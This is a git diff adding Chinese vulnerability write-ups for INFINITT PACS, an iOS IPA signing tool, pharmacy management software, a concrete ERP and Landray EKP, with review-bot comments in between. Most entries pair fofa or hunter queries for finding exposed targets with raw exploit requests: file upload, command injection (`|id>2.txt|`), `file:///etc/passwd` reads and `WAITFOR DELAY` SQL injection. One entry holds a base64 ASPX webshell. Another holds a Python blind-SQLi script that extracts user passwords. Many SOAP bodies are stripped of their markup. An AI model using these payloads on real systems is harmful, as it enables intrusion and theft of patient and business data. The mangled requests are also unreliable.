diff --git a/英飞达影像存档与通讯(PACS)系统INFINITTPACSWebJobUpload存在任意文件上传漏洞.md b/英飞达影像存档与通讯(PACS)系统INFINITTPACSWebJobUpload存在任意文件上传漏洞.md new file mode 100644 index 0000000..91c4767 --- /dev/null +++ b/英飞达影像存档与通讯(PACS)系统INFINITTPACSWebJobUpload存在任意文件上传漏洞.md @@ -0,0 +1,47 @@ +# 英飞达影像存档与通讯(PACS)系统INFINITT PACS WebJobUpload存在任意文件上传漏洞 + +# 一、漏洞简介 +英飞达是一家专业开发医学影像系统的公司,成立于1994年,早年PACS产品双子星:EFILM和PiviewSTAR,其中PiviewSTAR为我公司产品。2011年于KOSDAQ上市。产品覆盖放射、超声、内镜、病理、电生理、放疗等所有检查医技科室,生态支持单院区、多院区、区域、医联体、集团化、移动端、云端、互联网应用。客户数量多,全球6000多客户的选择,美国中小医院KLAS排第一,台湾前二,日本前三,另有德国,英国,中东,巴西,东南亚等多个地区设有分公司。中国三甲医院数量前三,西南、西北区优质客户数量第一。INFINITT PACS WebJobUpload接口存在任意文件上传漏洞 ,攻击者可通过该漏洞获取服务器权限,严重甚至导致医院的敏感病人数据泄露。 + +# 二、影响版本 ++ 英飞达影像存档与通讯(PACS)系统INFINITT PACS + +# 三、资产测绘 ++ hunter`web.icon="0cd46e0cba3abd067cd28e70eb7f2a5f"` ++ 特征 + +![1710050678798-3d2b7109-13a0-46c1-aa6a-f84048d5ce82.png](./img/8DdfWo-hBXKeoTtD/1710050678798-3d2b7109-13a0-46c1-aa6a-f84048d5ce82-135359.png) + +# 四、漏洞复现 +```plain +POST /webservices/WebJobUpload.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://rainier/jobUpload" + + + + + +1 + +2.aspx +MTIz + + + +``` + +![1710050894692-a465d756-5bf4-4db3-88b1-7c5c27a607f8.png](./img/8DdfWo-hBXKeoTtD/1710050894692-a465d756-5bf4-4db3-88b1-7c5c27a607f8-425462.png) + +```plain +/1/2.aspx +``` + +![1710050917663-a92660df-3fce-4504-a866-51789deb2860.png](./img/8DdfWo-hBXKeoTtD/1710050917663-a92660df-3fce-4504-a866-51789deb2860-606481.png) + + + +> 更新: 2024-05-15 15:36:03 +> 原文: \ No newline at end of file diff --git a/苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞.md b/苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞.md new file mode 100644 index 0000000..0be4bb5 --- /dev/null +++ b/苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞.md 
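Review bot: the SOAP body in the 漏洞复现 fence has lost its XML: only the text nodes `1`, `2.aspx` and `MTIz` survive, so the poc as committed cannot be replayed and the reader cannot tell which elements the three values belong to (the tags were most likely swallowed by an editor treating them as HTML); restore the envelope inside the fence. `Content-Length: length` is a literal placeholder and `Host:` is empty. 漏洞简介 is vendor copy in the vendor's own voice ('为我公司产品'); keep only the final sentence, and add an affected version (影响版本 repeats the product name) and a fix or vendor reference, since a PACS with unauthenticated file upload is exactly the case where a hospital defender needs the version to triage.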
@@ -0,0 +1,24 @@ +# 苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞 + +苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞,可能导致攻击者任意上传文件,控制服务器权限。 + +## fofa + +```javascript +body="/assets/index/css/mobileSelect.css" +``` + +## poc + +```javascript +GET /api/sign/sign?udidres[0][sjskg]=1&noinject[name]=a&ttname=1&udid=1&appname=1&appid=a&appicon=1&apppath=|id>2.txt|&p12path=1&mppath=1&appbid=1&ipaPath=1&gm=0&filesPath=1&rm=1&app_name=1 HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241107115421829](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071154927.png) \ No newline at end of file diff --git a/苹果IOS端IPA签名工具request_post任意文件读取漏洞 2.md b/苹果IOS端IPA签名工具request_post任意文件读取漏洞 2.md new file mode 100644 index 0000000..4df1187 --- /dev/null +++ b/苹果IOS端IPA签名工具request_post任意文件读取漏洞 2.md @@ -0,0 +1,20 @@ +# 苹果IOS端IPA签名工具request_post任意文件读取漏洞 + +苹果IOS端IPA签名工具request_post任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +body="/assets/index/css/mobileSelect.css" +``` + +## poc + +```javascript +GET /api/index/request_post?url=file:///etc/passwd&post_data=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +``` + +![image-20240926101437457](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261014514.png) \ No newline at end of file diff --git a/苹果IOS端IPA签名工具request_post任意文件读取漏洞.md b/苹果IOS端IPA签名工具request_post任意文件读取漏洞.md new file mode 100644 index 0000000..7a5e085 --- /dev/null +++ b/苹果IOS端IPA签名工具request_post任意文件读取漏洞.md 
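Review bot: `苹果IOS端IPA签名工具request_post任意文件读取漏洞 2.md` duplicates `苹果IOS端IPA签名工具request_post任意文件读取漏洞.md` (same summary sentence, same fofa query, same request); drop the " 2" copy or merge it into the full entry. In the Sign.php file the summary says the issue "可能导致攻击者任意上传文件", but what the poc shows is OS command injection through the `apppath` parameter; describe the actual flaw and state affected versions and the fix.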
@@ -0,0 +1,30 @@ +# 苹果IOS端IPA签名工具request_post任意文件读取漏洞 + +# 一、漏洞简介 +苹果IOS端IPA签名工具request_post任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +# 二、影响版本 ++ 苹果IOS端IPA签名工具r + +# 三、资产测绘 ++ fofa`body="/assets/index/css/mobileSelect.css"` ++ 特征 + +![1727408181627-7dd57a7d-22a5-477e-b7c2-290f545d0933.png](./img/b5h66i7l2NQvoD5j/1727408181627-7dd57a7d-22a5-477e-b7c2-290f545d0933-666408.png) + +# 四、漏洞复现 +```java +GET /api/index/request_post?url=file:///etc/passwd&post_data=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +``` + +![1727408257756-4dc51a62-813c-4540-b5bb-8260cd03159d.png](./img/b5h66i7l2NQvoD5j/1727408257756-4dc51a62-813c-4540-b5bb-8260cd03159d-058160.png) + + + + + +> 更新: 2024-10-22 09:36:08 +> 原文: \ No newline at end of file diff --git a/药业管理软件UploadFile文件上传漏洞.md b/药业管理软件UploadFile文件上传漏洞.md new file mode 100644 index 0000000..df277a5 --- /dev/null +++ b/药业管理软件UploadFile文件上传漏洞.md 
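Review bot: the 二、影响版本 bullet reads `苹果IOS端IPA签名工具r` with a stray trailing `r`, and the request block is fenced as `java` while the sibling entries use `javascript` or `plain` for HTTP requests; fix the typo and use one fence tag consistently. The entry also lacks a version range and any remediation (the `url` parameter accepting `file://` is the point to call out for the fix).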
@@ -0,0 +1,34 @@ +# 药业管理软件UploadFile文件上传漏洞 + +药业管理软件 XSDService.asmx 接口UploadFile实例存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码。 + + +## fofa +```javascript +body="XSDService.asmx" +``` + +## poc +```javascript +POST /XSDService.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/UploadFile" + + + + + + 2 + rce.aspx + PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiICU+CjwlCnZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbygiY21kIik7CnZhciBlPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcygpOwp2YXIgb3V0OlN5c3RlbS5JTy5TdHJlYW1SZWFkZXIsRUk6U3lzdGVtLklPLlN0cmVhbVJlYWRlcjsKYy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7CmMuUmVkaXJlY3RTdGFuZGFyZE91dHB1dD10cnVlOwpjLlJlZGlyZWN0U3RhbmRhcmRFcnJvcj10cnVlOwplLlN0YXJ0SW5mbz1jOwpjLkFyZ3VtZW50cz0iL2MgIiArIFJlcXVlc3QuSXRlbVsiY21kIl07CmUuU3RhcnQoKTsKb3V0PWUuU3RhbmRhcmRPdXRwdXQ7CkVJPWUuU3RhbmRhcmRFcnJvcjsKZS5DbG9zZSgpOwpSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7ClN5c3RlbS5JTy5GaWxlLkRlbGV0ZShSZXF1ZXN0LlBoeXNpY2FsUGF0aCk7ClJlc3BvbnNlLkVuZCgpOyU+ + 1 + + + +``` + +![image-20250103185234603](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031852686.png) + +文件路径:/Upload2015/2/rce.aspx?cmd=dir \ No newline at end of file diff --git a/药业管理软件XSDService.asmx存在SQL注入漏洞.md b/药业管理软件XSDService.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..ee487bc --- /dev/null +++ b/药业管理软件XSDService.asmx存在SQL注入漏洞.md 
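Review bot: the summary has a dropped word ("未经身份攻击者" should read "未经身份验证的攻击者"), and the SOAP body has lost its XML element tags so the request is not a valid envelope as committed. The body also embeds an opaque base64 blob whose nature is only implied by the closing line `/Upload2015/2/rce.aspx?cmd=dir`; state plainly in the text that it is a server-side script that executes the `cmd` parameter, so readers and repository scanners know what the file contains, and add affected versions and the vendor fix.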
@@ -0,0 +1,68 @@ +# 药业管理软件XSDService.asmx存在SQL注入漏洞 + +《黄药师》药业管理软件是一款针对我国医药或医疗器械企业经营管理特点而设计的综合管理软件。《黄药师》系列管理软件集进销存、财务、经营分析和GSP管理为一体,从企业经营的各个环节对资金流、物流、信息流等进行系统的管理。它采用“一看就懂,一学就会,一用就灵”的开发理念,人机界面友好,易学易用,能满足各类零售药店、连锁配送药店、批发公司以及集团化企业、事业行政单位、大型企业和中小型企业的业务管理需要。 + +## fofa + +```javascript +body="XSDService.asmx" +``` + +## poc + +```javascript +POST /XSDService.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetPdaTable" + + + + + + ;WAITFOR DELAY '0:0:5'-- + + + +``` + +```xml +POST /XSDService.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/ExecPdaSql" + + + + + + ;WAITFOR DELAY '0:0:5'-- + + + +``` + +```xml +POST /XSDService.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/SetMedia_Picture_info" + + + + + + 1';WAITFOR DELAY '0:0:5'-- + string + base64Binary + + + +``` + + + +![image-20241128094249866](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280943235.png) \ No newline at end of file diff --git a/荷花商品混凝土ERP系统DictionaryEdit.aspx页面存在SQL注入.md b/荷花商品混凝土ERP系统DictionaryEdit.aspx页面存在SQL注入.md new file mode 100644 index 0000000..66a6c5a --- /dev/null +++ b/荷花商品混凝土ERP系统DictionaryEdit.aspx页面存在SQL注入.md 
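Review bot: the first request block is fenced as `javascript` while the other two are `xml`; pick one tag. All three SOAP bodies have lost their element names, so it is no longer visible which `GetPdaTable`, `ExecPdaSql` and `SetMedia_Picture_info` parameters carry the `WAITFOR DELAY '0:0:5'--` payload; the summary is vendor marketing copy and should instead name the injectable parameters, note that `WAITFOR DELAY` implies a SQL Server backend, and list affected versions and the remediation (parameterised queries).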
@@ -0,0 +1,31 @@ +# 荷花商品混凝土ERP系统DictionaryEdit.aspx 页面存在SQL注入 + +# 一、漏洞简介 +杭州荷花软件有限公司开发的商混ERP系统。这套系统主要是处理建筑公司或者各项工程的搅拌站管理,内部含有销售模块、生产管理模块、实验室模块、人员管理等,该公司的商品混凝土ERP系统/Sys/DictionaryEdit.aspx处dict_key参数存在SQL报错注入漏洞,攻击者可通过该漏洞获取数据库权限。 + +# 二、影响版本 ++ 荷花商品混凝土ERP系统 + +# 三、资产测绘 ++ hunter`app.name=="荷花商品混凝土ERP系统"` ++ 特征 + +![1700038673461-c08709af-de7f-4bcf-b3c8-aa5dda30d94b.png](./img/J81dH0tJ3we7JtSC/1700038673461-c08709af-de7f-4bcf-b3c8-aa5dda30d94b-115449.png) + +# 四、漏洞复现 +```plain +/Sys/DictionaryEdit.aspx?dict_key=1 +``` + +出现如下页面大概率存在该漏洞 + +![1700038780840-29a40f07-46cc-42c4-a145-2e84c2f63ca8.png](./img/J81dH0tJ3we7JtSC/1700038780840-29a40f07-46cc-42c4-a145-2e84c2f63ca8-492785.png) + +sqlmap + +![1700038797493-de6b792b-3f04-4aa0-aeb7-6008e0cc67d9.png](./img/J81dH0tJ3we7JtSC/1700038797493-de6b792b-3f04-4aa0-aeb7-6008e0cc67d9-532453.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md b/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md new file mode 100644 index 0000000..dde9a1f --- /dev/null +++ b/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md 
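Review bot: the detection criterion in 四、漏洞复现 ("出现如下页面大概率存在该漏洞") depends entirely on a screenshot under `./img/`, and the `sqlmap` heading is a bare word followed by another screenshot; describe the error text returned for `dict_key=1` in words so the entry is verifiable without the images, and state affected versions and the fix (the summary already identifies `dict_key` as the injection point).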
@@ -0,0 +1,166 @@ +# 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞 + +蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +app="Landray-OA系统" +``` + +## poc + +访问save方法,填充一下数据库 + +```javascript +POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 76 + +method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1 +``` + +```javascript +POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 60 + +method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240962.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240942.png) + + + +## Python脚本 + +```python +import argparse + +import requests + +header = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" +} + + +def exploit_user(url,db_user): + global header + user_name = "" + for i in range(1, 20): + low = 1 + top = 255 + mid = (low + top) // 2 + while low < top: + send_data = { + "method": "getICareByFdId", + "ordertype": "down", + "fdNum": "aNsSl' or ascii(substring((user_name()),{},1)) < {} and '1'='1".format( + i, mid) + } + 
res = requests.post(url, data=send_data, headers=header) + if "docSubject" in res.text: + top = mid + else: + low = mid + 1 + mid = (top + low) // 2 + if mid <= 1 or mid >= 254: + break + user_name = user_name + chr(mid - 1) + print("[+]user_name:{}".format(user_name)) + print("\033[F", end="") + print("[+]user_name:{}".format(user_name)) +def exploit(url,username): + global header + password_len = 32 + password = "" + for i in range(1,password_len+1): + low = 1 + top = 255 + mid = (low + top) // 2 + while low < top: + send_data = { + "method": "getICareByFdId", + "ordertype": "down", + "fdNum": "aNsSl' or ascii(substring((select fdPassword from com.landray.kmss.sys.organization.model.SysOrgPerson where fdLoginName='{}'),{},1)) < {} and '1'='1".format( + username,i, mid) + } + res = requests.post(url,data=send_data,headers=header) + if "docSubject" in res.text: + top = mid + else: + low = mid + 1 + mid = (top + low) // 2 + password = password + chr(mid-1) + print("[+]password:{}".format(password)) + print("\033[F",end="") + print("[+]password:{}".format(password)) + +def scan_vuln(url,username,db_user): + global header + req_url = url.strip("/") + "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do" + + step_data = { + "method":"saveICare", + "fdId:""," + "fdNum":"1", + "docSubject":"1", + "fdName":"test", + "createTime":"1", + "fdStatus":"1" + } + try: + req1 = requests.post(req_url,data=step_data,headers=header) + if req1.status_code == 200 and "result" in req1.text: + print("[+]Vuln exist,start inject password:") + if db_user == "check": + exploit_user(req_url,db_user) + else: + exploit(req_url,username) + else: + print("[-]Vuln not exist.") + exit(0) + except: + print("[-]request error.") + exit(0) + pass + + +def main(): + parser = argparse.ArgumentParser(description="Process command line arguments") + parser.add_argument('-u', '--url', required=True, help='Target URL') + parser.add_argument('-db_user', '--db_user', required=False, help='db_user') + 
parser.add_argument('-U', '--username', required=False, help='Username argument') + + args = parser.parse_args() + + url = args.url + db_user = args.db_user + username = args.username + scan_vuln(url, username, db_user) + + +if __name__ == '__main__': + main() +``` + +## 漏洞来源 + +- https://xz.aliyun.com/t/16103?time__1311=GuD%3D7KiK0KYIx05DK7qCuxWuEoT6PGC4E8eD \ No newline at end of file diff --git a/蓝凌EKP系统任意文件读取漏洞集合.md b/蓝凌EKP系统任意文件读取漏洞集合.md new file mode 100644 index 0000000..3b9b094 --- /dev/null +++ b/蓝凌EKP系统任意文件读取漏洞集合.md 
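Review bot: `scan_vuln` sends the `saveICare` request unconditionally, which inserts a record into the target database (the text itself says 填充一下数据库); this data-modifying side effect must be documented prominently rather than presented as a harmless check, and the entry should say how to identify and remove the inserted record. Smaller points in the same script: the bare `except:` swallows every error including `KeyboardInterrupt`, both failure paths call `exit(0)` where a non-zero status is expected, and the `step_data` dict literal has misplaced quotes around `fdId`. No affected-version or vendor-fix information is given beyond the xz.aliyun.com source link.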
@@ -0,0 +1,235 @@ +# 蓝凌EKP系统任意文件读取漏洞集合 + +蓝凌OA webservice服务多处 接口存在任意文件读取漏洞 + +## fofa + +```javascript +body="Com_Parameter" +``` + +## poc1 + +```javascript +POST /sys/webservice/sysTagWebService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + +## poc2 + +```javascript +POST /sys/webservice/sysNotifyTodoWebService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + +## poc3 + +```javascript +POST /sys/webservice/kmImeetingBookWebService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + +## poc4 + +```javascript +POST /sys/webservice/kmImeetingResWebService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + 
+------4upt9dwdca8rtwq9osuz-- +``` + +## poc5 + +```javascript +POST /sys/webservice/loginWebserviceService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + +## poc6 + +```javascript +POST /sys/webservice/wechatWebserviceService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + +## poc7 + +```javascript +POST /sys/webservice/sysNotifyTodoWebServiceEkpj HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + +## poc8 + +```javascript +POST /sys/webservice/sysSynchroGetOrgWebService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + 
+![image-20241218111203883](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181112007.png) \ No newline at end of file diff --git a/蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞.md b/蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞.md new file mode 100644 index 0000000..e05c71a --- /dev/null +++ b/蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞.md @@ -0,0 +1,40 @@ +# 蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞 + +蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞 + +## fofa + +```javascript +body="Com_Parameter" +``` + +## poc + +```javascript +POST /sys/webservice/sysFormMainDataInsystemWebservice HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 +Connection: close +Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------4upt9dwdca8rtwq9osuz +Content-Disposition: form-data; name="a" + + + + + + + a + + + + + +------4upt9dwdca8rtwq9osuz-- +``` + +![image-20241218110643116](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181106199.png) + diff --git a/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md b/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md new file mode 100644 index 0000000..714b82b --- /dev/null +++ b/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md 
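Review bot: poc1 through poc8 in 蓝凌EKP系统任意文件读取漏洞集合.md are byte-for-byte identical apart from the endpoint path (`sysTagWebService`, `sysNotifyTodoWebService`, `kmImeetingBookWebService`, `kmImeetingResWebService`, `loginWebserviceService`, `wechatWebserviceService`, `sysNotifyTodoWebServiceEkpj`, `sysSynchroGetOrgWebService`), and every SOAP body has lost its XML markup leaving only `a`, so none is reproducible as committed; list the affected endpoints once and keep a single request template. The same applies to the sysFormMainDataInsystemWebservice entry on this line. Neither file states affected versions or a mitigation such as restricting access to `/sys/webservice/*`.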
@@ -0,0 +1,47 @@ +# 蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞 + +蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞 + +## fofa + +```javascript +body="Com_Parameter" +``` + +## poc + +```javascript +POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1 +Host: xxxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Connection: close +Content-Length: 563 +Content-Type: multipart/related; boundary=----oxmmdmlnvlx08yluof5q +SOAPAction: "" +Accept-Encoding: gzip, deflate + +------oxmmdmlnvlx08yluof5q +Content-Disposition: form-data; name="a" + + + + + + +1 +1 +1 +1 + + + + + +------oxmmdmlnvlx08yluof5q-- +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181052623.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/9xcoXmoJb8GJnID4D2Wa-g \ No newline at end of file diff --git a/蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞.md b/蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞.md new file mode 100644 index 0000000..4e6c11f --- /dev/null +++ b/蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞.md 
@@ -0,0 +1,45 @@ +# 蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞 +蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。 + +# hunter +```javascript +app.name="Landray 蓝凌OA" +``` + +![](https://cdn.nlark.com/yuque/0/2023/png/1622799/1699624430077-2cffea44-6670-4ae3-81c6-97bae85b26fd.png) + +## poc +```java +POST /sys/webservice/hrStaffWebService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 +Content-Length: 563 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +Cache-Control: max-age=0 +Connection: close +Content-Type: multipart/related; boundary=----frhpvivnctknnkiwugaq +SOAPAction: "" + +------frhpvivnctknnkiwugaq +Content-Disposition: form-data; name="1" + + + + + + + 1 + + + + + +------frhpvivnctknnkiwugaq-- +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1730429801848-e18487e1-ff5e-479a-af65-8a405e0f6c6b.png) + diff --git a/蓝凌OA-treexml.tmpl-远程命令执行漏洞.md b/蓝凌OA-treexml.tmpl-远程命令执行漏洞.md new file mode 100644 index 0000000..08820ce --- /dev/null +++ b/蓝凌OA-treexml.tmpl-远程命令执行漏洞.md 
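Review bot: `Content-Length: 563` is fixed in the request header while the body as committed is a few lines with its XML stripped, so the header no longer matches the body; the same `563` appears in the thirdImSyncForKKWebService entry on the previous line. The heading `# hunter` breaks the `## fofa` / `## poc` pattern used elsewhere, the fence is tagged `java` for an HTTP request, and no affected version or fix is stated.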
